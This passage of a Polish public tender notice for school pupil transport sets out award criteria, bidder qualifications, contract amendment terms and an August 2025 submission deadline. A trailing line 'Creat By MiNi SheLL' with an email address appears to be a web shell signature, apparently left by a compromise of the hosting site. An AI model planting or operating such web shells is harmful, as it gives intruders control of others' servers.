równocześnie Wykonawców, którzy złożyli oferty,<br/>podając uzasadnienie faktyczne i prawne, o:<br/>1) wyborze najkorzystniejszej oferty, podając nazwę albo imię i nazwisko, siedzibę albo miejsce zamieszkania, jeżeli jest miejscem<br/>wykonywania działalności wykonawcy, którego ofertę wybrano, oraz nazwy albo imiona i nazwiska, siedziby albo miejsca<br/>zamieszkania, jeżeli są miejscami wykonywania działalności Wykonawców, którzy złożyli oferty, a także punktację przyznaną<br/>ofertom w każdym kryterium oceny ofert i łączną punktację;<br/>2) Wykonawcach, których oferty zostały odrzucone.<br/>14. Jeżeli Wykonawca, którego oferta została wybrana jako najkorzystniejsza, uchyla się od zawarcia umowy w sprawie zamówienia<br/>publicznego lub nie wnosi wymaganego zabezpieczenia należytego wykonania umowy, Zamawiający może dokonać ponownego<br/>badania i oceny ofert spośród ofert pozostałych w postępowaniu Wykonawców oraz wybrać najkorzystniejszą ofertę albo unieważnić<br/>postępowanie.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wysokość polisy OC</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy spełniający warunki udziału w postępowaniu określone w SWZ i w<br/>art. 112 ustawy Pzp:<br/>1. posiadający zdolności do występowania w obrocie gospodarczym, tj.:<br/>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie wykonawca zobowiązany jest wykazać w<br/>sposób szczególny. Ocena spełniania warunku udziału w postępowaniu Wykonawców zostanie dokonana w oparciu o<br/>zasadę spełnia – nie spełnia na podstawie oświadczenia załączonego do oferty, zgodnie z wymaganiami określonymi przez<br/>Zamawiającego w niniejszym postępowaniu;<br/>2. posiadający uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z<br/>odrębnych przepisów, tj.:<br/>1) Wykonawca musi posiadać zezwolenie na wykonywanie transportu drogowego na podstawie art. 5 ustawy z dnia 6<br/>września 2001 r. o transporcie drogowym (t.j. Dz. U. z 2024 r. poz. 1539 z późn. zm.);<br/>2) Ocena spełnienia warunku udziału w postępowaniu wykonawców zostanie dokonana w oparciu o zasadę spełnia – nie<br/>spełnia na podstawie oświadczeń i dokumentów załączonych do oferty, zgodnie z wymaganiami określonymi przez<br/>Zamawiającego w niniejszym postępowaniu;<br/>3. znajdujący się w sytuacji ekonomicznej lub finansowej zapewniającej prawidłowe wykonanie zamówienia, tj.:<br/>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie wykonawca zobowiązany jest wykazać w<br/>sposób szczególny. Ocena spełniania warunku udziału w postępowaniu Wykonawców zostanie dokonana w oparciu o<br/>zasadę spełnia – nie spełnia na podstawie oświadczenia załączonego do oferty, zgodnie z wymaganiami określonymi przez<br/>Zamawiającego w niniejszym postępowaniu;<br/>4. posiadający zdolności techniczne lub zawodowe zapewniającej prawidłowe wykonanie zamówienia, tj.:<br/>1) Wykonawca musi wykazać, że wykonał lub wykonuje minimum 2 (dwie) usługi w zakresie dowozu uczniów do szkół<br/>odpowiadające swoim rodzajem usługom stanowiącym przedmiot zamówienia, o wartości nie mniejszej niż 100.000,00 zł<br/>(brutto) każda w okresie ostatnich trzech lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, z<br/>podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których zostały wykonane lub są wykonywane, na<br/>formularzu lub w oparciu o formularz stanowiący Załącznik nr 2 do SWZ. Dokument należy złożyć wraz z dokumentami<br/>potwierdzającymi, że usługi zostały wykonane lub są wykonywane należycie;<br/>2) Wykonawca musi wykazać na formularzu lub w oparciu o formularz stanowiący Załącznik nr 3 do SWZ, że dysponuje<br/>minimum 7 osobami posiadającymi prawo jazdy kat. D;<br/>3) Ocena spełnienia warunku udziału w postępowaniu wykonawców zostanie dokonana w oparciu o zasadę spełnia – nie<br/>spełnia na podstawie oświadczeń i dokumentów załączonych do oferty, zgodnie z wymaganiami określonymi przez<br/>Zamawiającego w niniejszym postępowaniu. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)Aktualna licencja na wykonywanie transportu drogowego na podstawie art. 5 ustawy z dnia 6 września 2001 r. o transporcie<br/>drogowym (t.j. Dz. U. z 2024 r. poz. 1539 z późn. zm.).<br/>2) Wykaz wykonania lub wykonywania minimum dwóch usług sporządzony na formularzu lub w oparciu o formularz stanowiący<br/>Załącznik nr 2 do SWZ. Dokument należy złożyć wraz z dokumentami potwierdzającymi, że usługa została wykonana lub jest<br/>wykonywana należycie.<br/>3) Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia sporządzony na formularzu lub w oparciu o formularz<br/>stanowiący Załącznik nr 3 do SWZ.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy wspólnie ubiegający się o zamówienie:<br/> ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązania;<br/> muszą ustanowić Pełnomocnika Wykonawców występujących wspólnie do reprezentowania ich w postępowaniu o<br/>udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia.<br/>Przyjmuje się, że pełnomocnictwo do podpisania oferty obejmuje pełnomocnictwo do poświadczenia za zgodność z<br/>oryginałem wszystkich dokumentów;<br/> pełnomocnictwo musi jednocześnie wynikać z umowy lub z innej czynności prawnej, mieć formę pisemną, fakt ustanowienia<br/>Pełnomocnika musi wynikać z załączonych do oferty dokumentów, wszelka korespondencja prowadzona będzie z<br/>Pełnomocnikiem;<br/> przed zawarciem umowy o niniejsze zamówienie publiczne, jeżeli oferta konsorcjum zostanie wybrana jako<br/>najkorzystniejsza, Zamawiający może wezwać do przedstawienia umowy regulującej współpracę tych Wykonawców.<br/>2. Oferta wspólna, składana przez dwóch lub więcej Wykonawców powinna spełniać następujące wymagania:<br/>1) musi być zgodna z postanowieniami SWZ;<br/>2) sposób składania dokumentów w przypadku składania oferty wspólnej:<br/>a) dokumenty wspólne, takie jak:<br/> oferta (Załącznik nr 1 do SWZ);<br/> licencja na wykonywanie transportu drogowego;<br/> wykaz wykonanych usług (Załącznik Nr 2 do SWZ);<br/> dokumenty potwierdzające, że usługi zostały wykonane lub są wykonywane należycie;<br/> potencjał kadrowy (Załącznik nr 3 do SWZ);<br/> oświadczenie wypełnienia obowiązków informacyjnych przewidzianych w art. 13 lub art. 14 RODO (Załącznik nr 6 do SWZ);<br/>podpisują wszyscy członkowie konsorcjum lub Pełnomocnik (Lider) w imieniu całego konsorcjum.<br/>b) dokumenty, takie jak:<br/> oświadczenie o spełnianiu warunków udziału w postępowaniu i braku podstaw do wykluczenia (Załącznik nr 5 do SWZ);<br/>składa każdy z partnerów konsorcjum w imieniu swojej firmy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość dokonania zmiany postanowień umowy na podstawie art. 455 ustawy Pzp, które<br/>zostaną wyrażone w formie pisemnego aneksu pod rygorem nieważności i mogą nastąpić wyłącznie w następujących<br/>sytuacjach:<br/>1) wprowadzanie istotnych zmian do przedmiotu zamówienia spowodowanych uwarunkowaniami formalno – prawnymi lub<br/>technicznymi, bez konieczności zwiększenia wynagrodzenia należnego Wykonawcy;<br/>2) zmniejszenia zakresu realizacji prac – usług, w przypadku wystąpienia zmiany okoliczności powodującej że:<br/>a) wykonanie części zakresu prac nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawierania<br/>umowy lub<br/>b) wykonanie części zakresu prac nie jest możliwe, z przyczyn nie leżących po stronie Zamawiającego i Wykonawcy;<br/>3) zmiany kwoty i terminu wykonania umowy, w przypadku:<br/>a) wystąpienia okoliczności, których nie można było przewidzieć w chwili zawarcia umowy,<br/>b) wniesienia przez Zamawiającego istotnej zmiany, na podstawie której Wykonawca wykonuje przedmiot umowy, przez co<br/>niemożliwe jest dotrzymanie terminu o którym mowa w umowie,<br/>c) wstrzymanie realizacji przedmiotu umowy przez Zamawiającego nie wynikające z przyczyn leżących po stronie<br/>Wykonawcy,<br/>d) wyrażenia zgody przez Zamawiającego na skrócenia terminu realizacji,<br/>e) wystąpienia opóźnienia w uzyskiwaniu decyzji i uzgodnień wydawanych przez inne organy w stosunku do terminów<br/>przewidzianych ustawowo lub w stosunku do innych przepisów z przyczyn nie leżących po stronie Wykonawcy,<br/>f) w sytuacji opóźnienia przez Zamawiającego przekazania danych na podstawie, których Wykonawca wykonuje<br/>dokumentację.<br/>4) w zakresie zmiany wynagrodzenia, zwłaszcza w sytuacji zmniejszenia zakresu realizacji usługi, zmiany stawki<br/>obowiązującego podatku od towarów i usług (VAT), utworzenia nowej placówki oświatowej.<br/>3. We wszystkich przypadkach określonych w ust. 2 pkt. 3, termin realizacji może ulec przedłużeniu, nie dłużej jednak niż o<br/>czas trwania tych okoliczności.<br/>4. Warunkiem dokonania zmian, o których mowa w ust. 2, jest złożenie wniosku przez stronę inicjującą zmianę<br/>zawierającego:<br/>1) opis propozycji zmiany,<br/>2) uzasadnienie zmiany,<br/>3) obliczenie kosztów zmiany zgodnie z zasadami określonymi w umowie, jeżeli zmiana będzie miała wpływ na<br/>wynagrodzenie Wykonawcy,<br/>4) opis wpływu zmiany na harmonogram realizacji i fakturowania oraz termin wykonania umowy.<br/>5. Wykonawca nie będzie uprawniony do żądania przedłużenia terminu wykonania umowy i zwiększenia wynagrodzenia,<br/>jeżeli zmiana jest wymuszona uchybieniem czy naruszeniem umowy przez Wykonawcę – w takim przypadku koszty<br/>dodatkowe związane takimi zmianami ponosi Wykonawca.<br/>6. Powyższe zmiany nie mogą być niekorzystne dla Zamawiającego.<br/>7. Poza przypadkami opisanymi w niniejszym paragrafie, zmiana umowy może nastąpić w przypadkach przewidzianych w<br/>art. 455 ust. 1 pkt. 2 – 4 i ust. 2 ustawy Pzp. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-08-01 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/malechowo</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-08-01 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-08-22</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com